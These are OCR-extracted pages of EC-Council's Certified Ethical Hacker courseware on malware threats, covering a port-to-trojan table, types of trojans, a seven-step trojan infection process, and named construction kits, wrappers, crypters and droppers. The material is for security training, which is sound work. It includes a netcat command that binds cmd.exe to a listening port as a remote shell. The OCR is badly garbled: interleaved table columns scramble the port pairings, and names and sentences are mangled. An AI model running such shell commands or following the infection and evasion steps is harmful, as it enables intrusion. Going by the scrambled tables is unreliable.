RedLeaves, S-Type, TEMP.Veles , Threat
Group-3390, TrickBot, Tropic Trooper, TYPEFRAME,
445
Module 07 Page 975
UBoatRAT
WannaCry, Petya, Dragonfly 2.0
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Port
Trojan
Port
Trojan
456
Hackers Paradise
8000
BADCALL, Comnie,
555
Ini-Killer, Phase Zero, Stealth Spy
8012
Volgmer Ptakks
Zeus, APT 37, Comnie, EvilGrab, FELIXROOT, FIN7, HTTPBrowser, 666
Satanz Backdoor, Ripper
8080
Lazarus Group, Magic Hound, OceanSalt, SType, Shamoon, TYPEFRAME, Volgmer
.
1001
Silencer, WebEx
1011
Doly Trojan
8443 8787/54321
FELIXROOT, Nidiran,
TYPEFRAME
BackOfrice 2000
1026/ 64666
RSM
9989
ene ge iNi-Killer
1095-98
RAT
10048
Delf
1170
Psyber Stream Server, Voice
10100
Gift
1177
njRAT
10607
Coma
1234
Ultors Trojan
11000
Senna Spy
1234/ 12345
. Valvo line
11223
. . Progenic Trojan
1243
SubSeven 1.0 -1.8
12223
Hack’99 KeyLogger
1243/6711 /6776/273 74
Sub Seven
1245
VooDoo Doll
4777
12345-46 12361,
1.0.9
GabanBus,
NetBus
12362
Whack-a-mole
Java RAT, Agent.BTZ/ComRat, Adwind RAT
16969
Priority
1349
Back Office DLL
20001
Millennium
1492
FTPSO9CMP.
Module 07 Page 976
20034/1120
NetBus 2.0, BetaNetBus 2.01
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Malware Threats
Exam 312-50 Certified Ethical Hacker
Port
Trojan
Port
1433
Misdat
21544
GirlFriend 1.0, Beta-1.35
1600
Shivka-Burka
el
Prosiak
1604
DarkComet RAT, Pandora RAT, HellSpy RAT
22222
Rux
1807
SpySender
23432
Asylum
1863
XtremeRAT
23456
Evil FTP, Ugly FTP
1981
Shockrave
25685
Moon Pie
1999
BackDoor 1.00-1.03
26274
Delta
2001
Trojan Cow
30100-02
NetSphere 1.27a
2115
Bugs
31337-38
reo /ben sO Orifice
2140
The Invasor
31338
DeepBO
2140/3150
DeepThroat
31339
NetSpy DK
2155
Illusion Mailer, Nirvana
31666
BOWhack
2801
Phineas Phucker
34324
BigGluck, TN
3129
Masters Paradise
40412
The Spy
3131
SubSari
3150
The Invasor
47262
Delta
3389
RDP
50766
Fore
Portal of Doom
53001
Remote
4000
RA
54321
SchoolBus .69-1.11 /
4567
File Nail 1
61466
Telecommando
Seite
40421-26
Trojan
Masters Paradise
Windows
7/10167
Module 07 Page 977
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Malware Threats Port
Exam 312-50 Certified Ethical Hacker
Trojan
4590
ICQTrojan
5000
Bubbel, SpyGate RAT, Punisher RAT
Port 65000
Trojan Devil
Table 7.1: Trojans and corresponding port of attack
Module 07 Page 978
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Types of Trojans
CE H
@ Trojans are categories according to their functioning and targets
‘@ Some of the example includes:
oO
Point-of-Sale Trojans
Security Disabler Software Trojans
Backdoor Trojans
Defacement Trojans
Destructive Trojans
Botnet Trojans
Service Protocol Trojans
DDoS Attack Trojans
Rootkit Trojans
Mobile Trojans
Command Shell Trojans
E-Banking Trojans
loT Trojans
1 |
Remote Access Trojans
|2 |
G
Types of Trojans Trojan are classified into many categories depending on the exploit functionality targets. Some Trojans types are listed below: 1.
Remote Access Trojans
8.
Service Protocol Trojans
2.
Backdoor Trojans
9.
Mobile Trojans
3.
Botnet Trojans
10. loT Trojans
4.
Rootkit Trojans
11. Security Software Disabler Trojans
5.
E-Banking Trojans
12. Destructive Trojans
6.
Point-of-Sale Trojans
13. DDoS Attack Trojans
7.
Defacement Trojans
14. Command Shell Trojans
Remote Access Trojans Remote access Trojans (RATs) provide attackers with full control over the victim’s system, thereby enabling them to remotely access files, private conversations, accounting data, etc. The RAT acts as a server and listens on a port that is not supposed to be available to Internet attackers. Therefore, if the user is behind a firewall on the network, it is less likely that a remote attacker will connect to the Trojan. Attackers in the same network located behind the firewall can easily access Trojans. For example, Jason is an attacker who intends to exploit Rebecca’s computer to steal her data. Jason infects Rebecca’s computer with server.exe and plants a reverse connecting Trojan. The Trojan connects through Port 80 to the attacker, establishing a reverse connection. Now, Jason has complete control over Rebecca’s machine. Module 07 Page 979 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Jason Attacker
Rebecca Victim Infected with RAT Trojan
Attacker gains 100% (complete) access to the system
Figure 7.5: Working of Remote Access Trojan
Attackers use RATs to infect the target machine to gain administrative access. RATs help an attacker to remotely access the complete GUI and control the victim’s computer without his or her
awareness.
keylogging, via phishing networked commands, webcams.
=
Moreover,
they
can
perform
screen
and
camera
capture,
code
execution,
file access, password sniffing, registry management, and so on. They infect victims attacks and drive-by downloads, and they propagate through infected USB keys or drives. They can download and execute additional malware, execute shell read and write registry keys, capture screenshots, log keystrokes, and spy on
njRAT njRAT is a RAT with powerful data-stealing capabilities. In addition to logging keystrokes, it can access a victim's camera, stealing credentials stored in browsers, uploading and downloading files, performing process and file manipulations, and viewing the victim's desktop. This RAT can be used to control botnets (networks of computers), thereby allowing the attacker to update, uninstall, disconnect, restart, and close the RAT, and rename its campaign ID. The attacker can further create and configure the malware to spread through USB drives with the help of the command-and-control server software. Features:
o
Remotely access the victim’s computer
o
Collect victim’s information such as IP address, hostname, and OS.
o
Manipulate files and system files
o
Open an active remote session providing the attacker access to the command line of the victim’s machine
co
Log keystrokes and steal credentials from browsers
Module 07 Page 980
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Instat Date | Flag | Country
Settings | [About
Figure 7.6: Screenshot of njRAT Some additional RATs are as follows: =
ProRat
=
FatalRAT
=
Theef
=
TeaBot
=
JSSLoader
=
FlawedAmmyy
=
CrimsonRAT
=
Ismdoor
=
MINEBRIDGE
=~
Kedi RAT
=
StrRAT
=
PCRat/ GhOst RAT
Backdoor Trojans A backdoor is a program that can bypass the standard system authentication or conventional system mechanisms such as IDS and firewalls, without being detected. In these types of breaches, hackers leverage backdoor programs to access the victim’s computer or network. The difference between this type of malware and other types of malware is that the installation of the backdoor is performed without the user’s knowledge. This allows the attacker to perform any activity on the infected computer, such as transferring, modifying, or corrupting files, installing malicious software, and rebooting the machine, without user detection. Backdoors are used by attackers for uninterrupted access to the target machine. Most backdoors are used
Module 07 Page 981 :
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
for targeted attacks. Backdoor Trojans are often used to group victim computers botnet or zombie network that can be used to perform criminal activities.
to form a
Backdoor Trojans are often initially used in the second (point of entry) or third (command-andcontrol
[C&C]) stage of the targeted attack process. The main difference between
a RAT and a
traditional backdoor is that the RAT has a user interface, i.e., the client component, which can be used by the attacker to issue commands to the server component residing in the compromised machine, whereas a backdoor does not.
For example, a hacker who is performing a malicious activity identifies vulnerabilities in a target network. The hacker implants the networkmonitor.exe backdoor in the target network, and the backdoor will be installed in a victim’s machine on the target network without being detected by network security mechanisms. Once installed, networkmonitor.exe will provide the attacker with uninterrupted access to the victim’s machine and the target network. =
Poisonivy
Poisonlvy gives the attacker practically complete control over the infected computer. The Poisonlvy remote administration tool is created and controlled by a Poisonlvy management program or kit. The Poisonlvy kit consists of a graphical user interface, and the backdoors are small (typically,
Trojan passes through
Victim
HTTP reply
Server
Figure 7.18: Working of HTTP Trojan
o
SHTTPD
SHTTPD is a small HTTP server that can be embedded inside any program. It can be wrapped with a genuine program (game chess.exe). When executed, it will turn a computer into an invisible web server. For instance, an attacker connects to the victim using web browser http://10.0.0.5:443 and infects the victim’s computer with chess.exe, with Shttpd running in the background and listening on port 443 (SSL). Module 07 Page 993 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Attacker
Normally Firewall allows
IP: 10.0.0.5:443
you through port 443
Victim
Encrypted Traffic
IP: 10.0.0.8:443
Figure 7.19: SHTTPD attack process
o
HTTP RAT
HTTP RAT uses web interfaces and port 80 to gain access. It can be understood simply as an HTTP tunnel, except that it works in the reverse direction. These Trojans are comparatively more dangerous as they work nearly ubiquitously where the Internet can be accessed.
Features o
Displays ads and records personal data/keystrokes
o
Downloads unsolicited files and disables programs/system
o
Floods Internet connection and distributes threats
o
Tracks browsing activities and hijacks Internet browser
o.
Makes fraudulent claims about spyware detection and removal i
f@ HTTP RAT O31
ind plant HTTP Trojan The Trojan sends an email with the location of an IP address v2)
‘ae vesontawe [OT ) sain & tendrawth '0 mat rtsabe: ten MIP seve & seg ‘can abel seve ster dedi sour enol hess Prsvoicn F coveFeewal sare gatfo0 Coste
Connect to the IP address using a browserto port 80
>
a
Victim
Generates using HTTP RAI
Attacker Figure 7.20: Working of HTTP RAT Trojan
=
ICMP Trojans
The Internet Control Message Protocol (ICMP) is an integral part of IP, and every IP module must implement it. It is a connectionless protocol that provides error messages to unicast addresses. The ICMP protocol encapsulates the packets in IP datagrams. Module 07 Page 994
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
An attacker can hide the data using covert channels methods in a protocol that is undetectable. The concept of ICMP tunneling allows one protocol to be carried over another protocol. ICMP tunneling uses ICMP echo request and reply to carry a payload and stealthily access or control the victim’s machine. Attackers can use the data portion of ICMP_ECHO and ICMP_ECHOREPLY packets for arbitrary information tunneling. Network layer devices and proxy-based firewalls do not filter or inspect the contents of ICMP_ECHO traffic, making the use of this channel attractive to hackers. Attackers simply pass, drop, or return the ICMP packets. The Trojan packets themselves masquerade as common ICMP_ECHO traffic. The packets can encapsulate (tunnel) any required information. ICMP Client (Command. icmpsend
Command Prompt
)
ICMP Server (Command. icmpsrv
x)
-install)
Command Prompt
‘Commands are sent using ICMP protocol
Figure 7.21: Working of ICMP Trojan
Mobile Trojans Mobile Trojans are malicious software that target mobile phones. Mobile increasing rapidly due to the global proliferation of mobile phones. The victim into installing the malicious application. When the victim downloads the Trojan performs various attacks such as banking credential stealing, credential stealing, data encryption, and device locking. =
Trojan attacks are attacker tricks the the malicious app, social networking
BasBanke BasBanke is a Trojan family that runs on Android. The Trojan was first identified in 2018 during the Brazilian elections, registering over 10,000 installations as of April 2019 from the official Google Play Store alone. It is a banking Trojan, and when it infects a device, it will perform keystroke logging, screen recording, SMS interception, and theft of credit card and financial information. To trick users into downloading this Trojan, the Trojan creators advertised it via WhatsApp and Facebook messages. The most widely spread and downloaded malicious version of BasBanke is the fake CleanDroid Android app. CleanDroid projects itself as a mobile junk cleaning and memory boosting app; however, it is actually a banking Trojan.
Module 07 Page 995
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Malware Threats
Exam 312-50 Certified Ethical Hacker
QOS
a
O | @ ttips://mfacebookcom
iy
Clean Droid
Patrocinado
B 2% 03:42
@
:
foe
€
QOS 4
B 2%
Google Play
03:24
Q
CleanDroid
@
MatriFOT
Artee design | | Numero8: Em alta
100% Gratis esse APP promete até 70% em economia
de dados 36/46, protege seus arquivos contra virus, otimiza seu celular limpando arquivos que provocam a lentidao. CleanDroid é um salva-vidas para aqueles que adoram misica e video, enviam muitas mensagens e trabalham em aplicagdes em seus celulares Android. Nao perca tempo baixe e confira
INSTALAR
46%
ag
‘Mavaliagbes
Mais q
Classificago Live ©
Dow
CleanDroid cleandroid.gplay.services CleanDroid - Unico CleanDroid - Unico Aplicativo de seguranca reco.
ooe« curtir
6 compartilhamentos Compartilhar
&
Somos 0 tinico aplicativo que possui mais recursos
Figure 7.22: Screenshot of BasBanke Mobile Trojan
Some additional mobile Trojans are as follows: =
Agent Smith
=
Asacub
=
Hiddad
=
Gustuff
=
AndroRAT
=
GriftHorse
=
Rotexy
=
Vultur
=
Gplayed
loT Trojans
Internet of things (loT) refers to the inter-networking of physical devices, buildings, and other items embedded with electronics. loT Trojans are malicious programs that attack loT networks. These Trojans leverage a botnet to attack other machines outside the loT network. =
Mirai
Mirai is a self-propagating loT botnet that infects poorly protected Internet devices (loT devices). Mirai uses telnet port (23 or 2323) to find those devices that are still using their factory default username and password. Most loT devices use default usernames and passwords. Mirai can infect such insecure devices (bots) and co-ordinate them to mount a DDoS attack against a chosen victim. Module 07 Page 996
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Features:
o
Login attempts with 60 different factory default username and password pairs
o
Built for multiple CPU architectures (x86, ARM, Sparc, PowerPC, Motorola)
o
Connects to C&C to allow the attacker to specify an attack vector
o
Increases bandwidth usage for infected bots
o
Identifies and removes competing malware
o
Blocks remote administration ports
Figure 7.23: Screenshot displaying Mirai DDoS attack botnet Trojan Prevention: o
Using anti-Trojan software and updating Mirai DDoS botnet Trojan attacks.
usernames
and
passwords
can
prevent
Some additional loT Trojans are as follows: =
Silex BrickerBot
=
Gafgy Botnet
=
Satori
=
Katana
=
Torii botnet
=
BotenaGo
=
Miori loT Botnet
=
Ttint
=
Bashlite loT Malware
=
Dark Nexus
Module 07 Page 997
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Security Software Disabler Trojans Security software disabler Trojans stop the working of security programs such as firewalls, and IDS, either by disabling them or killing the processes. These are entry Trojans, which allow an attacker to perform the next level of attack on the target system. Some security software disabler Trojans are as follows:
=
CertLock
=
GhostHook
=
Trojan.Disabler
Destructive Trojans
The sole may not randomly resulting
purpose of a destructive Trojan is to delete files on a target system. Antivirus software detect destructive Trojans. Once a destructive Trojan infects a computer system, it deletes files, folders, and registry entries as well as local and network drives, often in OS failure.
Destructive Trojans are written as simple crude batch files with commands such as "DEL," "DELTREE," or "FORMAT." This destructive Trojan code is usually compiled as .ini, .exe, .dll, or .com files. Thus, it is difficult to determine if a destructive Trojan causes a computer system infection. The attacker can activate these Trojans or they can be set to initiate at a fixed time and date. Shamoon is still considered as the most destructive Trojan. Shamoon uses a Disttrack payload that is configured to wipe systems as well as virtual desktop interface snapshots. This Trojan propagates internally by logging in using legitimate domain account credentials, copying itself to the system, and creating a scheduled task that executes the copied payload. Other currently prevalent destructive Trojans include Dimnie, GreyEnergy, Killdisk, HermeticWiper, WhisperGate, and FoxBlade. DDoS Trojans These Trojans are intended to perform DDoS attacks on target machines, networks, or web addresses. They make the victim a zombie that listens for commands sent from a DDoS Server on the Internet. There will be numerous infected systems standing by for a command from the server, and when the server sends the command to all or a group of the infected systems, since all the systems perform the command simultaneously, a considerable amount of legitimate requests flood the target and cause the service to stop responding. In other words, the attacker, from his/her computer along with several other infected computers, sends multiple requests to the victim and overwhelm the target, leading to a DoS. This can also be achieved by mass spam emails.
Mirai loT botnet Trojan is still considered as one of the most notorious DDoS attack Trojans. Other recently discovered DDoS attack Trojans that have affected a large number of systems and networks and caused major disruptions in businesses include Electrum DDoS botnet and Bushido Botnet. All these DDoS Trojans have similar attack strategies. They identify the
Module 07 Page 998
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
unsecured devices in a network and enslave them to launch a DDoS attack on the victim’s machine. Once installed on a Windows computer, the Trojan connects to a command-andcontrol (C&C) server from which it downloads a configuration file containing a range of IP addresses to attempt authentication over several ports. Along with the infected botnet zombies, it performs DDoS attacks in which a zombie floods a target server/machine with malicious traffic. Command Shell Trojans A command shell Trojan provides remote control of a command shell on a victim’s machine. A Trojan server is installed on the victim's machine, which opens a port, allowing the attacker to connect. The client is installed on the attacker's machine, which is used to launch a command shell on the victim’s machine. Netcat, DNS Messenger, GCat are some of the command shell Trojans.
C:> ne
ED" El»
C:> ne -L -p -t
-e
cmd.exe
Figure 7.24: Working of Command Shell Trojan
Module 07 Page 999
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
How to Infect Systems Using a Trojan STEP STEP STEP STEP STEP STEP
Attacker i Fee Trojan
Packet
1: 2: 3: 4: 5: 6:
CE H
Create a new Trojan packet Employa dropper or downloader to install the malicious code on the target system Employa wrapperto bind the Trojanto a legitimate file Employa crypter to encrypt the Trojan Propagate the Trojan by various methods Deploy the Trojan on the victim's machine by executing dropper or downloader on the target machine
STEP 7: Execute the damage routine Dropper
Downloader
2
Wrapper
Calc.exe i)
Victim's Machine
Crypter
Propagate
Deploy
Damage Routine
Copyright © by
How to Infect Systems Using a Trojan An attacker can remotely control the system
hardware
and software by installing a Trojan on
the system. Once the Trojan is installed on the system, the data become vulnerable to threats. In addition, the attacker can perform attacks on third-party systems.
Attackers deliver Trojans in many ways to infect target systems:
Trojans are included in bundled shareware or downloadable software. download such files, the target systems automatically install the Trojans.
When
users
Different pop-up ads try to trick users. They are programmed by the attacker such that regardless of whether users click YES or NO, a download will begin and the Trojan will automatically install itself on the system. Attackers send the Trojans as email attachments. When attachments, the Trojans are automatically installed.
users open
these
malicious
Users are sometimes tempted to click on different types of files, such as greeting cards, porn videos, and images, which might contain Trojans. Clicking on these files installs the Trojans. Attackers infect a target machine using a Trojan in the following steps: Step 1: Create a new Trojan packet using various tools such as Trojan Horse Construction Kit, Social Engineering Toolkit (SET), and Beast. New Trojans have a higher chance of succeeding in compromising the target system, as the security mechanisms might fail to detect them. These Trojans can be transferred to the victim’s machine using a dropper or downloader.
Module 07 Page 1000
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
=
Step 2: Employ a dropper or a downloader to install the malicious code on the target system. The dropper appears to users as a legitimate application or a well-known and trusted file. However, when it is run, it extracts the malware components hidden in it and executes them, usually without saving them to the disk, to avoid detection. Droppers include images, games, or benign messages in their packages, which serve as a decoy to divert users’ attention from malicious activities. Downloaders are malware transporters that do not contain the actual malware file; however, they contain the link from where the actual Trojan can be downloaded. When a downloader is executed on the target machine, it connects back to the attacker’s server and downloads the intended Trojan on the victim’s machine. Droppers can easily evade firewalls; however,
a downloader can be detected with the help of network analyzer tools. =
Step 3: Employ a wrapper such as petite.exe, Graffiti.exe, IExpress Wizard, or eLiTeWrap to help bind the Trojan executable to legitimate files to install it on the target system.
=
Step 4: Employ a crypter such as BitCrypter to encrypt the Trojan to evade detection by firewalls/IDS.
=
Step 5: Propagate the Trojan by implementing various methods
such as sending it via
overt and covert channels, exploit kits, emails, and instant messengers, thereby tricking users into downloading and executing it. An active Trojan can perform malicious activities such as irritating users with constant pop-ups, changing desktops, changing or deleting files, stealing data, and creating backdoors. =
Step 6: Deploy the Trojan on the victim’s machine by executing the dropper or downloader software to disguise it. The deployed file contains wrapped and encrypted malware.
=
Step 7: Execute the damage routine. Most malware contain a damage routine that delivers payloads. Some payloads just display images or messages, whereas others can even delete files, reformat hard drives, or cause other damage. The damage routine can also include malware beaconing.
Crypter
Propagate
Deploy
Victim’s Machine Damage Routine
Figure 7.25: Diagram showing the complete process involved in infecting target machine using Trojan
Module 07 Page 1001 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Creating a Trojan
CEH
@ Trojan Horse construction kits help attackers to construct Trojan horses of their choice @ The tools in these kits can be dangerous and can backfire if not properly executed
DarkHorse Trojan Virus Maker ——_— DarkHorse Trojan virus maker creates user-specified Trojans by selecting from various options (> Doone Tjon Vos Moker 1.2)
Trojan Horse Construction Kits
@ Trojan Horse Construction Kit
Tan Vi Make I Yieboam Shearing
© Senna Spy Trojan Generator
7
a
Ii Her Computer
© Batch Trojan Generator
© Umbra Loader- Botnet Trojan Maker
N
;
[cet (reste Astecri As Textee | Copyright © by
Al Rights Reserved Reproduction i
Creating a Trojan Attackers can create Trojans using various Trojan horse construction Trojan Virus Maker, and Senna Spy Trojan Generator.
kits such as DarkHorse
Trojan Horse Construction Kit
Trojan horse construction kits help according to their needs. These tools New Trojans created by attackers scanning tools, as they do not match to succeed in launching attacks.
Module 07 Page 1002
attackers construct Trojan horses and customize them are dangerous and can backfire if not properly executed. remain undetected when scanned by virus- or Trojanany known signatures. This added benefit allows attackers
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
=
DarkHorse Trojan Virus Maker DarkHorse Trojan Virus Maker is used to create user-specified Trojans via selection from a variety of available options. The Trojans are created to act according to these selected options. For example, if you choose the option Disable Process, the Trojan disables all processes on the target system. The figure below shows a snapshot of DarkHorse Trojan Virus Maker with its various available options.
| x|
(> DarkHorse Trojan Virus Maker 1.2)
tart Button Mar
Figure 7.26: Screenshot of DarkHorse Trojan Virus Maker
Some additional Trojan horse construction kits are as follows: =
Trojan Horse Construction Kit
=
Senna Spy Trojan Generator
=
Batch Trojan Generator
=
Umbra Loader - Botnet Trojan Maker
Module 07 Page 1003
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Employing a Dropper or Downloader
CE H
Droppers
Downloaders
|@ Dropper is used to camouflage the malware payloads that can impede the functioning of the targeted systems
@ Downloader is a program that can download and install harmful programs like malware
‘@
‘@
Dropper consists of one or more types of
malware features that can make it
as dropper does, so there is the possibility for
a new unknown downloader to pass through
undetectable by antivirus software; also the
the anti-malware scanner
installation process can be done stealthy @
Downloader does not carry malware of itself
@ Godzilla Downloader, Trojan.Downloader,
Emotet dropper, Dridex dropper, Gymdrop,
W97M.Downloader, and
and Anatsa are some of the famous droppers that attackers employ for deploying malware to the target machine
ISB.Downloader!gen309 are some of the famous downloaders that attackers employ for deploying malware to the target machine
Employing a Dropper or Downloader After constructing their intended Trojans, attackers can employ a dropper or a downloader to transmit the Trojan package to the victim’s machine.
Droppers Droppers are programs that are used to camouflage malware payloads that can impede the functioning of thetargetsystem.The dropper consists of one or more types of malware
features that
can
make
it
undetectable
by
antivirus
software;
moreover,
the
installation process can be stealthily performed. The dropper is executed by simply loading its own code into the memory, and the malware payload is then extracted and written into the file system. Next, the malware installation process is initiated, and the payload is executed. Emotet, Dridex, Gymdrop, and Anatsa are deploying malware on the target machine.
well-known
droppers
that
attackers
employ
for
Downloaders A downloader is a program that can download and install harmful programs such as malware. Downloaders are similar to droppersto a certain extent. However, the main difference is that
a downloader does not carry malware itself whereas a dropper does; hence, it
is possible for a new unknown downloader to pass through the anti-malware scanner. Attackers use downloaders as part of the payload or other harmful programs that can drop and stealthily install the malware. Downloaders are spread as camouflaged files attached in emails, and the attached programs pose as legitimate programs such as accounts.exe or invoices.
Module 07 Page 1004
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Malware Threats
Exam 312-50 Certified Ethical Hacker
When the victim opens the attached infected file, the downloader tries to contact the remote server for directly fetching other malicious programs. Godzilla downloader, Trojan.Downloader, W97M.Downloader, and ISB.Downloader!gen309 are some well-known downloaders that attackers employ for deploying malware on the target machine.
Module 07 Page 1005 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Employing
a Wrapper
|
© Awrapperbindsa Trojan executable with genuine looking .EXE applications, aa such as games or office applications ©@ When the user runs the wrapped .EXE, itfirst installs the Trojanin the background and then runs the wrapping application in the foreground @ Attackers might send a birthday greeting that will install a Trojanas the user watches, for example, a birthday cake dancingacross the screen Express
@
Wizard
5 opr Wcwt
x
‘Welcome to [Express 2.0
¥: Trojan.exe ~~ fie ste 20
Wrappers
Express Wizard wrapper
Tia wdasecov you cede enag/ Ber Pe
© eLiTeWrap
a self-extracting package
Pisa
@ Advanced File Joiner
guides the user to create that can automatically install the embedded
setup files, Trojans, etc.
nef dnetisancOoetacargse chon,”
maaaoan
© Opened Se Etec Ds f:
© Soprano 3
a
Ts]
cot
© Exe2vbs © Kriptomatik
oe
Aa 2? wp
Employing a Wrapper Wrappers bind the Trojan executable with.EXE applications that appear genuine, such as games or office applications. When the user runs the wrapped .EXE application, it first installs the Trojan in the background and then runs the wrapping application in the foreground. The attacker can compress any (DOS/WIN) binary with tools such as petite.exe. This tool decompresses an EXE file (once compressed) at run time. Thus, it is possible for the Trojan to get in virtually undetected, as most antivirus software cannot detect the signatures in the file.
The attacker can also place several executables inside one executable. These wrappers may also support functions such as running one file in the background and another one on the desktop. Technically speaking, wrappers are a type of “glueware” used to bind other software components together. A wrapper encapsulates several components into a single data source to make it usable in a more convenient manner compared to the original unwrapped source.
The lure of free software can trick users into installing Trojan horses. For instance, a Trojan horse might arrive in an email described as a computer calculator. When the user receives the email, the description of the calculator may lead him/her to install it. Although it may, in fact, be a default application, once the user installs the application file, the Trojan is installed in the background and it will perform other actions that are not readily apparent to the user, such as deleting files or emailing sensitive information to the attacker. In another instance, an attacker
sends a birthday greeting that will install dancing across the screen.
Module 07 Page 1006
a Trojan as the user watches, e.g., a birthday cake
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
x
Trojan.exe File size: 20K
v
Calc.exe ile size:90K
«===
«
File size: 110K
Figure 7.27: Example of Wrapper
Covert Wrapper Programs
=
lExpress Wizard lExpress Wizard is a wrapper program that guides the user to create a self-extracting package that can automatically install the embedded setup files, Trojans, etc. IExpress can remove the setup files after execution and thus erase traces of Trojans. Then, it can run a program or only extract hidden files. Such embedded Trojans cannot be detected by antivirus software. lexpress Wizard
x
Welcome to [Express 2.0 This wizard will help you create a self-extracting/ seffinstaling package First, you need to create a Self Extraction Directive (SED) fle to store information about your package. f you have already done this, select Open existing one: otherwise, select Create New Self Extraction Directive file.
@ Create new Sef Extraction Directive file. © Open existing Se Extraction Directive file:
cos [Ties] coe Figure 7.28: Screenshot of IExpress Wizard
Some additional wrapper tools are as follows: =
eLiTeWrap
=
Exe2vbs
=
Advanced File Joiner
=
Kriptomatik
=
Soprano 3
Module 07 Page 1007
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Employing a Crypter ©
CE H
Crypter is software used by hackers to hide viruses, keyloggers or tools in any kind of file, so that they do not easily get detected by antiviruses
BitCrypter
Bitcrypter
Crypters
BitCrypter can be used
@ SwayzCryptor
32-bit executables and .NET apps without affecting their direct functionality
© Snip3
to encrypt and compress
@ Babadeda © Aegis Crypter 2.0 @ Hidden Sight Crypter © Battleship Crypter served. Reproduction
Employing a Crypter A crypter is a software that encrypts the original binary code of the .exe file. Attackers use crypters to hide viruses, spyware, keyloggers, RATs, etc., to make them undetectable by antivirus software. Some crypters that one can use to prevent malicious programs from being detected by security mechanisms are as follows. =
BitCrypter
Source: https://www.crypter.com BitCrypter can be used to encrypt and compress 32-bit executables and .NET apps without affecting their direct functionality. A Trojan or malicious software piece can be encrypted into legitimate software to bypass firewalls and antivirus software. BitCrypter supports a wide range of OS, from Windows XP to the latest Windows 10.
Module 07 Page 1008
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Malware Threats
Exam 312-50 Certified Ethical Hacker
Figure 7.29: Screenshot of BitCrypter
Some additional crypter tools are as follows: =
SwayzCryptor
Hidden Sight Crypter
=
Snip3
Battleship Crypter
=
Babadeda
HEAVEN CRYPTER
=
Aegis Crypter 2.0
Cypherx
Module 07 Page 1009
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Propagating and Deploying a Trojan Deploy a Trojan through Emails
|
Major Trojan Attack Paths:
© User clicks on the malicious link
© User opens malicious email attachments
Apple Store Ecoanaente
The Trojan connects to the attack server
Dear Customs Link to Trojan Server Towew he mostupto-dte Apple Onna Store ere, vatsasoreon
Youcan a contact Apple Stare Customer Serica 1-810-576-2775 eit ee
Victim
clicks the link and immediately connects to Trojan server
*
infecting his machine
‘Attacker sends an email to victim
Internet
Trojan is sent to the victim
Propagating and Deploying a Trojan (Cont’d)
CE H
Deploy a Trojan through Covert Channels
